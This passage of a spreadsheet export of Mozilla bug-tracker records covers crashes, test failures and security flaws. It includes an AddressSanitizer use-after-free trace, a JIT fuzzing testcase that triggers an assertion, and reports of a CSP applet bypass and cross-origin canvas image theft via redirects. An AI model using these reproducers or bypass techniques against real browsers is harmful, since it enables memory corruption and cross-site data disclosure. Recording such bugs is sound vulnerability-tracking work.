    #31 0x7f1699e4ec41 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #32 0x7f1699e4ec41 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #33 0x7f1699e1af44 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #34 0x7f1699e1c50f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #35 0x7f1699e06806 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #36 0x7f1699e0a86d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #37 0x7f169c080055 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
    #38 0x7f169cdfa1de in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7615:5
    #39 0x7f169cdf5fb4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7415:7
    #40 0x7f169cdfd57f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7312:13
    #41 0x7f1696c786a0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsWrapperCache.h:210:15 in HasFlag
Shadow bytes around the buggy address:
  0x0c1e8000cc10: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c1e8000cc20: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1e8000cc30: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
  0x0c1e8000cc40: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1e8000cc50: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=&gt;0x0c1e8000cc60: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1e8000cc70: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1e8000cc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1e8000cc90: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1e8000cca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1e8000ccb0: 00 fa fa fa fa fa fa fa fa fa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936==ABORTING</t>
        </is>
      </c>
      <c r="X442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" t="n">
        <v>978811</v>
      </c>
      <c r="B443" t="inlineStr">
        <is>
          <t>2014-03-03 08:57:24 -0800</t>
        </is>
      </c>
      <c r="C443" t="inlineStr">
        <is>
          <t>Assertion failure: MapTypeToTraceKind&lt;T&gt;::kind == GetGCThingTraceKind(thing), at gc/Marking.cpp:163</t>
        </is>
      </c>
      <c r="D443" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:44 -0700</t>
        </is>
      </c>
      <c r="E443" t="n">
        <v>1</v>
      </c>
      <c r="F443" t="n">
        <v>1</v>
      </c>
      <c r="G443" t="n">
        <v>3</v>
      </c>
      <c r="H443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J443" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K443" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L443" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M443" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N443" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P443" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q443" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R443" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S443" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T443" t="n">
        <v>1</v>
      </c>
      <c r="U443" t="n">
        <v>0</v>
      </c>
      <c r="V443" t="n">
        <v>29</v>
      </c>
      <c r="W443" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 4cb766685b73 (run with --fuzzing-safe --ion-eager):
function testcase() {
        var obj = {};
        Object.defineProperty(obj, "prop", { get: testcase });
        try {
            obj.prop &lt;&lt;=  20;
        } catch (e) {
            testcase('' + Float32Array);
        }
}
testcase();</t>
        </is>
      </c>
      <c r="X443" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" t="n">
        <v>662471</v>
      </c>
      <c r="B444" t="inlineStr">
        <is>
          <t>2011-06-06 22:38:36 -0700</t>
        </is>
      </c>
      <c r="C444" t="inlineStr">
        <is>
          <t>Uppercase directory names raises package name value error</t>
        </is>
      </c>
      <c r="D444" t="inlineStr">
        <is>
          <t>2011-06-09 00:14:45 -0700</t>
        </is>
      </c>
      <c r="E444" t="n">
        <v>1</v>
      </c>
      <c r="F444" t="n">
        <v>1</v>
      </c>
      <c r="G444" t="n">
        <v>6</v>
      </c>
      <c r="H444" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I444" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J444" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K444" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P444" t="inlineStr"/>
      <c r="Q444" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R444" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S444" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T444" t="n">
        <v>1</v>
      </c>
      <c r="U444" t="n">
        <v>0</v>
      </c>
      <c r="V444" t="n">
        <v>15</v>
      </c>
      <c r="W444" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Git Master 
~/addon-sdk/bin/cfx run
Traceback (most recent call last):
  File "/Users/arky/addon-sdk/bin/cfx", line 29, in &lt;module&gt;
    cuddlefish.run()
  File "/Users/arky/addon-sdk/python-lib/cuddlefish/__init__.py", line 679, in r
un                                                                             
    include_dep_tests=options.dep_tests
  File "/Users/arky/addon-sdk/python-lib/cuddlefish/packaging.py", line 319, in 
generate_build_for_target                                                      
    add_section_to_build(target_cfg, "tests", is_code=True)
  File "/Users/arky/addon-sdk/python-lib/cuddlefish/packaging.py", line 294, in 
add_section_to_build                                                           
    validate_resource_hostname(name)
  File "/Users/arky/addon-sdk/python-lib/cuddlefish/packaging.py", line 78, in v
alidate_resource_hostname                                                      
    raise ValueError('package names need to be lowercase: %s' % name)
ValueError: package names need to be lowercase: jid1-9jt9biif6spzaa-Test-tests
Reproducible: Always</t>
        </is>
      </c>
      <c r="X444" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" t="n">
        <v>908933</v>
      </c>
      <c r="B445" t="inlineStr">
        <is>
          <t>2013-08-23 17:06:00 -0700</t>
        </is>
      </c>
      <c r="C445" t="inlineStr">
        <is>
          <t>CSP does not block cross-domain applets with object-src 'self'</t>
        </is>
      </c>
      <c r="D445" t="inlineStr">
        <is>
          <t>2022-10-31 08:44:49 -0700</t>
        </is>
      </c>
      <c r="E445" t="n">
        <v>1</v>
      </c>
      <c r="F445" t="n">
        <v>1</v>
      </c>
      <c r="G445" t="n">
        <v>3</v>
      </c>
      <c r="H445" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I445" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J445" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K445" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L445" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M445" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N445" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P445" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q445" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R445" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S445" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T445" t="n">
        <v>1</v>
      </c>
      <c r="U445" t="n">
        <v>0</v>
      </c>
      <c r="V445" t="n">
        <v>106</v>
      </c>
      <c r="W445" t="inlineStr">
        <is>
          <t>1. View this URL - preferably while inspecting HTTP headers:
http://webappsec-test.info/~mwobensmith/CSP/object-src/CSP_2_3.php
Result:
Applet is loaded, despite prohibited via CSP directive. There are no console errors.
Ignore the text on the page that may or may not indicate test passed/failed; just note presence of applet. The applet is sourced from a subdomain different than the containing HTML page.
Note that this is different than bug 908824, as no errors are generated and it affects FF24+.</t>
        </is>
      </c>
      <c r="X445" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" t="n">
        <v>1451452</v>
      </c>
      <c r="B446" t="inlineStr">
        <is>
          <t>2018-04-04 12:16:54 -0700</t>
        </is>
      </c>
      <c r="C446" t="inlineStr">
        <is>
          <t>Flash Protected Mode enabled state is reverse of settings checkbox in 32-bit Firefox</t>
        </is>
      </c>
      <c r="D446" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E446" t="n">
        <v>1</v>
      </c>
      <c r="F446" t="n">
        <v>1</v>
      </c>
      <c r="G446" t="n">
        <v>6</v>
      </c>
      <c r="H446" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I446" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J446" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K446" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L446" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M446" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N446" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P446" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q446" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R446" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S446" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T446" t="n">
        <v>1</v>
      </c>
      <c r="U446" t="n">
        <v>0</v>
      </c>
      <c r="V446" t="n">
        <v>28</v>
      </c>
      <c r="W446" t="inlineStr">
        <is>
          <t>STR:
1. Grab a recent 32-bit build of Firefox.  I have seen this with the latest release from [1].
2. Run it and create a new profile
3. Go to about:addons and then to the plugins tag
4. Under Shockwave Flash, click "more"
Actual results:
A checkbox labeled "Enable Adobe Flash protected mode", unchecked
Expected results:
A checkbox labeled "Enable Adobe Flash protected mode", checked
-------
This means that the 32-bit builds are not running the Adobe Flash sandbox by default, and our plugin sandbox doesn't run at all under 32-bit.  IOW, 32-bit plugin processes are not currently sandboxed at all.
This looks to be because the setting is tied to the Firefox plugin sandbox level, which should only apply to 64-bit builds [2].  I'm pretty sure removing the condition will fix the bug.
Note that there is an issue with the 32-bit sandbox on nightly that influences this -- bug 1446499, which is how I found this one.  But that bug does not exist outside of nightly.
-------
[1] https://www.mozilla.org/en-US/firefox/all/
[2] https://searchfox.org/mozilla-central/rev/a0665934fa05158a5a943d4c8b277465910c029c/dom/plugins/ipc/PluginModuleParent.cpp#556</t>
        </is>
      </c>
      <c r="X446" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" t="n">
        <v>451619</v>
      </c>
      <c r="B447" t="inlineStr">
        <is>
          <t>2008-08-21 13:07:59 -0700</t>
        </is>
      </c>
      <c r="C447" t="inlineStr">
        <is>
          <t>Redirects permit cross-domain and local-system image disclosure via CANVAS</t>
        </is>
      </c>
      <c r="D447" t="inlineStr">
        <is>
          <t>2009-01-05 12:38:42 -0800</t>
        </is>
      </c>
      <c r="E447" t="n">
        <v>1</v>
      </c>
      <c r="F447" t="n">
        <v>1</v>
      </c>
      <c r="G447" t="n">
        <v>2</v>
      </c>
      <c r="H447" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I447" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J447" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K447" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L447" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M447" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N447" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P447" t="inlineStr">
        <is>
          <t>[sg:high] fixed by 355126</t>
        </is>
      </c>
      <c r="Q447" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R447" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S447" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T447" t="n">
        <v>1</v>
      </c>
      <c r="U447" t="n">
        <v>0</v>
      </c>
      <c r="V447" t="n">
        <v>10</v>
      </c>
      <c r="W447" t="inlineStr">
        <is>
          <t>Hi,
Chris Evans (Cc:ed) found out that the security restrictions applied to CANVAS toDataURL() and getImageData() methods once drawImage() is called on a given CANVAS to render a non-same-origin image, may be trivially bypassed if image source is initially specified in SRC attribute to be same-origin, but then HTTP 30x redirected to a non-same-origin resource.
This permits theft of potentially sensitive data across domains, should the victim be logged into any services that either store private images, or provide any sensitive visualisations at predictable locations.
Just as amusingly, I noticed that this may be exploited to very accurately enumerate locally installed software - and effectively, fingerprint the computer - by abusing moz-icon: as a redirection target:
http://lcamtuf.coredump.cx/ico_sniff2.html (works in FF2 on Windows)
According to Chris, this does not affect FF3.</t>
        </is>
      </c>
      <c r="X447" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" t="n">
        <v>1254958</v>
      </c>
      <c r="B448" t="inlineStr">
        <is>
          <t>2016-03-09 04:04:33 -0800</t>
        </is>
      </c>
      <c r="C448" t="inlineStr">
        <is>
          <t>browser_mozLoop_telemetry.js fails due to not resetting prefs</t>
        </is>
      </c>
      <c r="D448" t="inlineStr">
        <is>
          <t>2016-03-09 06:37:30 -0800</t>
        </is>
      </c>
      <c r="E448" t="n">
        <v>1</v>
      </c>
      <c r="F448" t="n">
        <v>1</v>
      </c>
      <c r="G448" t="n">
        <v>6</v>
      </c>
      <c r="H448" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I448" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J448" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L448" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M448" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N448" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P448" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q448" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R448" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S448" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T448" t="n">
        <v>1</v>
      </c>
      <c r="U448" t="n">
        <v>0</v>
      </c>
      <c r="V448" t="n">
        <v>5</v>
      </c>
      <c r="W448" t="inlineStr">
        <is>
          <t>I tried exporting master yesterday as Dave and I were testing a new mochitests, and we came across the fact that browser_mozLoop_telemetry.js is failing:
564 INFO TEST-UNEXPECTED-FAIL | browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js | LOOP_MAU_TYPE.OPEN_PANEL - 0 === 1 - JS frame :: chrome://mochitests/content/browser/browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js :: test_mozLoop_telemetryAdd_loopMauType_buckets :: line 172
565 INFO TEST-UNEXPECTED-FAIL | browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js | LOOP_MAU_TYPE.OPEN_CONVERSATION - 0 === 1 - JS frame :: chrome://mochitests/content/browser/browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js :: test_mozLoop_telemetryAdd_loopMauType_buckets :: line 174
566 INFO TEST-UNEXPECTED-FAIL | browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js | LOOP_MAU_TYPE.OPEN_PANEL - 0 === 1 - JS frame :: chrome://mochitests/content/browser/browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js :: test_mozLoop_telemetryAdd_loopMau_more_than_30_days :: line 196
567 INFO TEST-UNEXPECTED-FAIL | browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js | LOOP_MAU_TYPE.OPEN_PANEL - 1 === 2 - JS frame :: chrome://mochitests/content/browser/browser/extensions/loop/chrome/test/mochitest/browser_mozLoop_telemetry.js :: test_mozLoop_telemetryAdd_loopMau_more_than_30_days :: line 205
The issue appears to be that the prefs aren't always reset before and between tests. I'll have a patch up in a few.</t>
        </is>
      </c>
      <c r="X448" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" t="n">
        <v>316837</v>
      </c>
      <c r="B449" t="inlineStr">
        <is>
          <t>2005-11-17 04:42:17 -0800</t>
        </is>
      </c>
      <c r="C449" t="inlineStr">
        <is>
          <t>crash in [@ strchr - nsNSSCertificateDB::getCertNames] on cert without nickname</t>
        </is>
      </c>
      <c r="D449" t="inlineStr">
        <is>
          <t>2006-08-25 12:40:39 -0700</t>
        </is>
      </c>
      <c r="E449" t="n">
        <v>1</v>
      </c>
      <c r="F449" t="n">
        <v>1</v>
      </c>
      <c r="G449" t="n">
        <v>3</v>
      </c>
      <c r="H449" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I449" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J449" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K449" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L449" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M449" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N449" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P449" t="inlineStr">
        <is>
          <t>[kerh-bra]</t>
        </is>
      </c>
      <c r="Q449" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R449" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S449" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T449" t="n">
        <v>1</v>
      </c>
      <c r="U449" t="n">
        <v>0</v>
      </c>
      <c r="V449" t="n">
        <v>11</v>
      </c>
      <c r="W449" t="inlineStr">
        <is>
          <t>NSS in a firefox trunk build from 20051113.
How:
nsCOMPtr&lt;nsIX509CertDB&gt; certDB (do_GetService (NS_X509CERTDB_CONTRACTID));
certDB-&gt;FindCertNicknames (NULL, nsIX509Cert::SERVER_CERT, &amp;cnt, &amp;list);
Trace:
#0  0xb6e57a63 in strchr () from /lib/tls/i686/cmov/libc.so.6
#1  0xb2c19235 in nsNSSCertificateDB::getCertNames (this=0x880e4e0, certList=0x880e598, type=8, _count=0xbf9012b4, _certNames=0xbf9012b0)
    at /opt/source/mozilla/trunk-ff/mozilla/security/manager/ssl/src/nsNSSCertificateDB.cpp:1235
#2  0xb2c193f2 in nsNSSCertificateDB::FindCertNicknames (this=0x880e4e0, aToken=0x0, aType=8, _count=0xbf9012b4, _certNames=0xbf9012b0)
    at /opt/source/mozilla/trunk-ff/mozilla/security/manager/ssl/src/nsNSSCertificateDB.cpp:197
(gdb) frame 1
#1  0xb2c19235 in nsNSSCertificateDB::getCertNames (this=0x880e4e0, certList=0x880e598, type=8, _count=0xbf9012b4, _certNames=0xbf9012b0)
    at /opt/source/mozilla/trunk-ff/mozilla/security/manager/ssl/src/nsNSSCertificateDB.cpp:1235
1235            char *sc = strchr(namestr, ':');
Current language:  auto; currently c++
(gdb) list
1230          PR_FREEIF(dbkey);
1231          if (type == nsIX509Cert::EMAIL_CERT) {
1232            namestr = node-&gt;cert-&gt;emailAddr;
1233          } else {
1234            namestr = node-&gt;cert-&gt;nickname;
1235            char *sc = strchr(namestr, ':');
1236            if (sc) *sc = DELIM;
1237          }
1238          nsAutoString certname = NS_ConvertASCIItoUCS2(namestr);
1239          certstr.Append(PRUnichar(DELIM));
(gdb) p namestr
$1 = 0x0
(gdb) p *node-&gt;cert
$2 = {arena = 0x884f690, subjectName = 0x8850740 "CN=certs.synchroedit.com/signing,O=Alacrity Management Corporation,C=US,ST=California,L=Berkeley",
  issuerName = 0x88507a8 "CN=certs.synchroedit.com,O=Alacrity Management Corporation,C=US,ST=California,L=Berkeley", signatureWrap = {data = {
      type = siBuffer, data = 0x88501cc "0\202\002\026\uffff\003\002\001\002\002\004\177\uffffW\uffff0\r\006\t*\206H\206\uffff\r\001\001\004\005", len = 538},
    signatureAlgorithm = {algorithm = {type = siBuffer, data = 0x88503ea "*\206H\206\uffff\r\001\001\004\005", len = 9}, parameters = {type = siBuffer,
        data = 0x88503f3 "\005", len = 2}}, signature = {type = siBuffer,
      data = 0x88503f9 "w\u02f3\212~\uffff%\uffffH+\uffff\203\206\uffff\u0428I\uffff\003\uffff\215]\uffffm\uffff\201G~\022\uffffS8\uffff\uffff\uffff\212\206\206\2255\215\uffff&amp;\uffffk\236hS\uffff\uffffUl\201\216N\uffffj\203\037\uffff\uffff\a\uffff\uffff\uffff\237&lt;o\uffff*^\uffff?.=M\uffff+D\uffffN{&gt;e\t\uffff\223\uffff\uffffQ\005\202\uffff\\XZa\217\uffff\uffffM\uffffN\230?\212vx\uffff\001\uffff\v\uffff\213\031\uffffc\u0537\uffff/\225\022\uffff\uffffh\0343\uffff\uffff\uffff\uffff\uffff\uffff\uffff\230\004\205\b\234\004\205\b\uffff\004\205\b\uffff\004\205\b\uffff\004\205\b",
      len = 1024}}, derCert = {type = siBuffer,
    data = 0x88501c8 "0\202\002\uffff0\202\002\026\uffff\003\002\001\002\002\004\177\uffffW\uffff0\r\006\t*\206H\206\uffff\r\001\001\004\005", len = 689}, derIssuer = {
    type = siBuffer,
    data = 0x88501ea "0\1771\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifornia1\v0\t\006\003U\004\006\023\002US1(0&amp;\006\003U\004\n\023\037Alacrity Management Corporation1\0360\034\006\003U\004\003\023\025certs.synchroedit.com0\036\027\r050826201059Z\027\r131126201059Z0\201\2071\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifo"..., len = 129}, derSubject = {type = siBuffer,
    data = 0x885028b "0\201\2071\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifornia1\v0\t\006\003U\004\006\023\002US1(0&amp;\006\003U\004\n\023\037Alacrity Management Corporation1&amp;0$\006\003U\004\003\023\035certs.synchroedit.com/signing0\201\2370\r\006\t*\206H\206\uffff\r\001\001\001\005",
    len = 138}, derPublicKey = {type = siBuffer, data = 0x8850315 "0\201\2370\r\006\t*\206H\206\uffff\r\001\001\001\005", len = 162}, certKey = {type = siBuffer,
    data = 0x88506a0 "\177\uffffW\uffff0\1771\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifornia1\v0\t\006\003U\004\006\023\002US1(0&amp;\006\003U\004\n\023\037Alacrity Management Corporation1\0360\034\006\003U\004\003\023\025certs.synchroedit.com\uffff\uffff\uffff\uffff\"\f'\2037\uffff\uffff\002x\206n\uffffa\uffff6eD`Y\uffff\uffff\uffff\uffffCN=certs.synchroedit.com/signing,O=Alacr"..., len = 133}, version = {type = siBuffer, data = 0x88501d4 "\002\002\004\177\uffffW\uffff0\r\006\t*\206H\206\uffff\r\001\001\004\005", len = 1},
  serialNumber = {type = siBuffer, data = 0x88501d7 "\177\uffffW\uffff0\r\006\t*\206H\206\uffff\r\001\001\004\005", len = 4}, signature = {algorithm = {type = siBuffer,
      data = 0x88501df "*\206H\206\uffff\r\001\001\004\005", len = 9}, parameters = {type = siBuffer, data = 0x88501e8 "\005", len = 2}}, issuer = {arena = 0x0,
    rdns = 0x8850480}, validity = {arena = 0x0, notBefore = {type = siUTCTime,
      data = 0x885026f "050826201059Z\027\r131126201059Z0\201\2071\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifornia1\v0\t\006\003U\004\006\023\002US1(0&amp;\006\003U\004\n\023\037Alacrity Management Corporation1&amp;0$\006\003U\004\003\023\035certs.synchroedit.com/signing0\201\2370\r\006\t*\206H\206\uffff\r\001\001\001\005", len = 13}, notAfter = {type = siUTCTime,
      data = 0x885027e "131126201059Z0\201\2071\0210\017\006\003U\004\a\023\bBerkeley1\0230\021\006\003U\004\b\023\nCalifornia1\v0\t\006\003U\004\006\023\002US1(0&amp;\006\003U\004\n\023\037Alacrity Management Corporation1&amp;0$\006\003U\004\003\023\035certs.synchroedit.com/signing0\201\2370\r\006\t*\206H\206\uffff\r\001\001\001\005", len = 13}}, subject = {arena = 0x0, rdns = 0x8850550}, subjectPublicKeyInfo = {arena = 0x0, algorithm = {algorithm = {type = siBuffer,
        data = 0x885031c "*\206H\206\uffff\r\001\001\001\005", len = 9}, parameters = {type = siBuffer, data = 0x8850325 "\005", len = 2}}, subjectPublicKey = {
      type = siBuffer, data = 0x885032b "0\201\211\002\201\201", len = 1120}}, issuerID = {type = siBuffer, data = 0x0, len = 0}, subjectID = {
    type = siBuffer, data = 0x0, len = 0}, extensions = 0x8850620, emailAddr = 0x0, dbhandle = 0x87ef310, subjectKeyID = {type = siBuffer,
    data = 0x8850728 "\uffff\"\f'\2037\uffff\uffff\002x\206n\uffffa\uffff6eD`Y\uffff\uffff\uffff\uffffCN=certs.synchroedit.com/signing,O=Alacrity Management Corporation,C=US,ST=California,L=Berkeley",
    len = 20}, keyIDGenerated = 0, keyUsage = 132, rawKeyUsage = 132, keyUsagePresent = 1, nsCertType = 16, keepSession = 0, timeOK = 0, domainOK = 0x0,
  isperm = 1, istemp = 0, nickname = 0x0, dbnickname = 0x0, nssCertificate = 0x8927c80, trust = 0x8850808, referenceCount = 1, subjectList = 0x0,
  authKeyID = 0x0, isRoot = 0, authsocketlist = 0x0, series = 0, slot = 0x87f0c80, pkcs11ID = 4087546326, ownSlot = 1}
